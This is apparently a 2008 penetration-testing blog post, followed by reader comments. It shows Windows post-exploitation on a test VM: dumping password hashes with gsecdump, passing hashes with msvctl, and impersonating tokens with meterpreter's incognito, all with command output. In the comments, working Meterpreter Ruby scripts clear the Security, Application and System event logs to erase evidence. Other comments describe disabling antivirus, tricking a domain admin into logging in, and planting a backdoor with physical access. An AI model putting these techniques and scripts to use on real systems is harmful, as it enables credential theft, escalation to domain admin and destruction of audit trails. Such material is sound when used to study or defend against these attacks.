carnal0wnage [Shared Reader]

Friday, September 12, 2008

passing the hash with gsecdump and msvctl (yes more)

So just a follow up post on gsecdump and msvctl after doing prep for post exploitation topics for the toorcon workshop.

For some reason I thought that gsecdump would not require admin privileges, this is incorrect it will require admin or system on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here).

"Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info."

OK, so you still need admin or higher but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to to that is active logon sessions. So if you are userland and admin or higher then you might be stuck with that user's hash because once the log out the active logon session hash seems to disappear (sometimes ??) but if you get a system shell you might get some of the old logged in users.

example:
#popped a system shell and got a command shell with meterpreter

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

#logged into the box as nobody

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Logged out as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But, once you have a hash, any user can use that hash where you have to be admin/system to pass tokens.

Let's see the same scenario with incognito

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#login as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPSP1VM\nobody

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#log out as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
XPSP1VM\nobody

meterpreter > impersonate_token XPSP1VM\\nobody
[-] No delegation token available
[+] Successfully impersonated user XPSP1VM\nobody
meterpreter > getuid
Server username: XPSP1VM\nobody
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. Which is kind of a bummer, with a remote shell. You'll have to use the pass the hash toolkit instead.

Some other reading on gsecdump and msvctl
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml

http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx

Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold.

http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx
best quote:

"Hash injection mitigation? - Steve Riley [MSFT] <06-oct-07 style="font-weight: bold;">In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are fare more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."

I don't know, going from a local admin on a box to domain admin is pretty interesting to me...

11 comments:

Mubix said...

CG you should check out http://hak5.org/forums/index.php?showtopic=9742&view=findpost&p=100051

Someone found some code that lets you access files through the windows permission structure (getting the same without admin) I haven't test this code out, so use with caution.

Anonymous said...

OT: which is the simplest way to use meterpreter to clear logs on a windows system? Thank you very much

Anonymous said...

I see this on ChiCon07_Gates_Metasploit-Day2-FunStuff.pdf, I don't know if it works fine:

clearseclog.rb

print_
line("Clearing the Security Event
Log, it will leave a 517 event\n")
log = client.sys.eventlog.open('security')
log.clear

chris said...

that works just fine on XP/2003, I havent tested it on Vista or Server2008.

it will leave a 517 though. I had done some research and didnt see a way with the current API to pick specific logs and delete, you'd have to upload a third party tool to do that.

Anonymous said...

Very good! And I added this:

print_line("Clearing the Security Event Log, it will leave a 517 event!")
log = client.sys.eventlog.open('security')
log.clear
log.close

print_line("Clearing the Application Event Log!")
log = client.sys.eventlog.open('application')
log.clear
log.close

print_line("Clearing the System Event Log!")
log = client.sys.eventlog.open('system')
log.clear
log.close

Anonymous said...

http://www.carnal0wnage.com/research/clearalllog.rb

Anonymous said...

you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. If you are on the network you can run the tool on your own windows box, so your machine impersonates the hashes you copied off the other machine. This means there is no requirement for RDP etc


Anonymous Steve!

cfelix said...

Let me fill in some details and add some more questions on passing the hash:
1) The first issue is getting in as local admin. In my company the boot order was HD first, but this took 1 minute to bypass by removing the relevant jumper. Next, ophcrack will give you the local admin password, but it does cost some 999$ if this involves non-alphanumeric values. There are other tools to replace the local admin password with your own, basically think of a password, run it through MD5 to produce a hash, then use a LiveCD to replace the relevant SAM hash by your own.
So, first step is the easy one.
2) Next, you need gsecdump. Well, any antivirus I know kills it as soon as it is seen by Windows. So what do you do? You write it on a read-only media like a CD. Still, I get an 'access denied' message from the AV. So you need to kill AV. Two ways I can think of: Erase the relevant folder via a LiveCD or boot in SafeMode and erase the relevant executables in that folder. I was unable to disable AV otherwise. Next, you need to trick a domain admin into doing a remote access, perhaps asking for help with your printer or something. Assuming this access does take place and the domain admin does not reboot the machine, but logs off, then under Local Computer Policy->Computer Configuration->Windows Settings->Security Settings->Security Options->Interactive Logon: Number of Previous logons to cache(in case domain controller....)
you see that the system keeps the last N logons. If N=1, then only the last credentials are kept, i.e. your own, when you log on after the domain admin has logged off. So this attack is not that simple and it looks like it can be prevented with the right configuration, unless I miss something.

CG said...

or if you have physical access to the box just boot to a linux distro and just stick your backdoor on the box and wait for someone to log in....

no reason to do a bunch of crazy shit if you already have access.

cfelix said...

@CG: Note quite. For one, waiting for someone to log in, you'll get a LOCAL user, not necessarily a domain admin. Second, he'll surely notice this is **not** an XP machine. This attack aims to get the domain admin credentials, which is as big a game as you'll get.

CG said...

cfelix said...

>@CG: Note quite. For one, waiting for someone to log in, you'll get a LOCAL user, not necessarily a domain admin.

True, but all users startup catches everyone, and there are ways to get an admin to log in.

>Second, he'll surely notice this is **not** an XP machine.

umm, reboot the box back into windows after you drop the backdoor.

>This attack aims to get the domain admin credentials, which is as big a game as you'll get.

Agree, but i'll take user access over nothing any day.